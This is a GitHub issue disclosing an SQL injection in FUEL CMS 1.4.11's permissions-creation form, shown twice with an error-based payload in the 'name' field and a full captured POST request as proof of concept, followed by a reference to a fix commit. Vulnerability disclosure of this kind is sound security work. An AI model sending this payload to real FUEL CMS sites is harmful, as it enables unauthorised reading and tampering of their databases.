Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
FUEL CMS 1.4.11 allows SQL Injection via parameter 'name' in /fuel/permissions/create/ Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
payload: a")or extractvalue(1,concat(0x23,user()))#
Poc: POST /FUEL/fuel/permissions/create/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3405189478671501608124578765 Content-Length: 2181 Origin: http://localhost Connection: close Referer: http://localhost/FUEL/fuel/permissions/create Cookie: fuel_bar=%257B%2522show_fuel_bar%2522%253A%25220%2522%252C%2522show_editable_areas%2522%253A%25220%2522%257D; fuel_262c6342d4c36d3c073734c54972a54a=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_262c6342d4c36d3c073734c54972a54a=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522tabs_assets_create%2522%253A%25221%2522%252C%2522tabs_assets_create_5a47396a63773d3d%2522%253A%25221%2522%252C%2522tabs_assets_create_5a47396a63773d3d%252522_alert%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25221%2522%252C%2522tabs_pages_select%2522%253A%25220%2522%252C%2522tabs_assets_create_615731685a32567a4c334e7a63334e7a63773d3d%2522%253A%25221%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%252C%2522tabs_navigation_edit_1%2522%253A%25220%2522%252C%2522fuel_permissions_items%2522%253A%2522list%2522%257D; PHPSESSID=vi872kt7o20ir3pviar60bkrd4; ci_session=r5pfeo4dt6rptgrbv45fmen4rvsr3t5s Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache
-----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="description"
adsf -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="name"
a")or extractvalue(1,concat(0x23,user()))# -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="exists_users"
1 -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="other_perms[]"
create -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="other_perms[]"
edit -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="other_perms[]"
publish -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="other_perms[]"
delete -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="exists_other_perms"
1 -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="active"
yes -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="id"
-----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="fuel_module"
permissions -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="fuel_module_uri"
permissions -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="fuel_id"
-----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="fuel_inline_action"
create -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="fuel_inline"
0 -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="ci_csrf_token_FUEL"
d2417201849fd467eee1dcaf6bd4a294 -----------------------------3405189478671501608124578765 Content-Disposition: form-data; name="fuel_inline"
0 -----------------------------3405189478671501608124578765--
Burpsuite Response pic:
The text was updated successfully, but these errors were encountered:
fix: issue #575
25ff3dd
No branches or pull requests
FUEL CMS 1.4.11 allows SQL Injection via parameter 'name' in /fuel/permissions/create/

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
payload:
a")or extractvalue(1,concat(0x23,user()))#
Poc:
POST /FUEL/fuel/permissions/create/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3405189478671501608124578765
Content-Length: 2181
Origin: http://localhost
Connection: close
Referer: http://localhost/FUEL/fuel/permissions/create
Cookie: fuel_bar=%257B%2522show_fuel_bar%2522%253A%25220%2522%252C%2522show_editable_areas%2522%253A%25220%2522%257D; fuel_262c6342d4c36d3c073734c54972a54a=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_262c6342d4c36d3c073734c54972a54a=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522tabs_assets_create%2522%253A%25221%2522%252C%2522tabs_assets_create_5a47396a63773d3d%2522%253A%25221%2522%252C%2522tabs_assets_create_5a47396a63773d3d%252522_alert%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25221%2522%252C%2522tabs_pages_select%2522%253A%25220%2522%252C%2522tabs_assets_create_615731685a32567a4c334e7a63334e7a63773d3d%2522%253A%25221%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%252C%2522tabs_navigation_edit_1%2522%253A%25220%2522%252C%2522fuel_permissions_items%2522%253A%2522list%2522%257D; PHPSESSID=vi872kt7o20ir3pviar60bkrd4; ci_session=r5pfeo4dt6rptgrbv45fmen4rvsr3t5s
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="description"
adsf
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="name"
a")or extractvalue(1,concat(0x23,user()))#
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="exists_users"
1
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
create
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
edit
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
publish
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
delete
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="exists_other_perms"
1
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="active"
yes
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="id"
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_module"
permissions
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_module_uri"
permissions
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_id"
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_inline_action"
create
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_inline"
0
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="ci_csrf_token_FUEL"
d2417201849fd467eee1dcaf6bd4a294
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_inline"
0
-----------------------------3405189478671501608124578765--
Burpsuite Response pic:
The text was updated successfully, but these errors were encountered: